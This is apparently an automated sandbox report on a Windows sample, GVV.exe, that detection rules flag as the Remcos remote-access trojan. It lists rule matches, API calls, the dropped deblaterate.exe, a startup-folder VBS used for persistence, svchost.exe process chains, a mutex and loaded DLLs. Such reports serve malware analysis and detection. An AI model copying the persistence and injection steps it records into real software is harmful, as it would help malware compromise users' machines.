          Source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@12/21@2/2
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001837B5 GetLastError,FormatMessageW,0_2_001837B5
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001710BF AdjustTokenPrivileges,CloseHandle,0_2_001710BF
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001716C3
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004D10BF AdjustTokenPrivileges,CloseHandle,4_2_004D10BF
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,4_2_004D16C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_00417952
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00417952
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001851CD
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0019A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0019A67C
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0018648E
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001142A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AA4A
          Source: C:\Users\user\Desktop\GVV.exeFile created: C:\Users\user\AppData\Local\silvexesJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2248
          Source: C:\Users\user\Desktop\GVV.exeFile created: C:\Users\user\AppData\Local\Temp\autEA6E.tmpJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
          Source: GVV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: GVV.exeReversingLabs: Detection: 34%
          Source: GVV.exeVirustotal: Detection: 30%
          Source: C:\Users\user\Desktop\GVV.exeFile read: C:\Users\user\Desktop\GVV.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\GVV.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Users\user\Desktop\GVV.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\Desktop\GVV.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\Desktop\GVV.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\GVV.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: GVV.exeStatic file information: File size 1369600 > 1048576
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: GVV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
          Source: GVV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: GVV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: GVV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: GVV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: GVV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00130A76 push ecx; ret 0_2_00130A89
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00490A76 push ecx; ret 4_2_00490A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00457106 push ecx; ret 5_2_00457119
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0045B11A push esp; ret 5_2_0045B141
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0045E54D push esi; ret 5_2_0045E556
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00457A28 push eax; ret 5_2_00457A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434E56 push ecx; ret 5_2_00434E69
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00457106 push ecx; ret 15_2_00457119
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0045B11A push esp; ret 15_2_0045B141
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0045E54D push esi; ret 15_2_0045E556
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00457A28 push eax; ret 15_2_00457A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00434E56 push ecx; ret 15_2_00434E69
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00406EB0 ShellExecuteW,URLDownloadToFileW,5_2_00406EB0
          Source: C:\Users\user\Desktop\GVV.exeFile created: C:\Users\user\AppData\Local\silvexes\deblaterate.exeJump to dropped file

          Boot Survival

          barindex
          Drops VBS files to the startup folder
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to dropped file
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AA4A
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0012F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0012F98E
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001A1C41
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0048F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_0048F98E
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00501C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_00501C41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041CB50
          Source: C:\Users\user\Desktop\GVV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
